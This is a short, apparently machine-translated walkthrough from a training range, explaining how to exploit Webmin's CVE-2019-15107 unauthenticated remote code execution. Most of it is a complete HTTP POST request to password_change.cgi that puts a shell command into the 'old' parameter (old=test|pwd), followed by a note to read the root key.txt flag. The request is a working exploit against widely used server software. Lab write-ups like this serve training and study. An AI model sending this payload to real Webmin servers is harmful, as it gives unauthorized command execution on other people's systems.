Moher College webmin unauthenticated remote code execution

First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters

POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2

Directly query the root key.txt that will do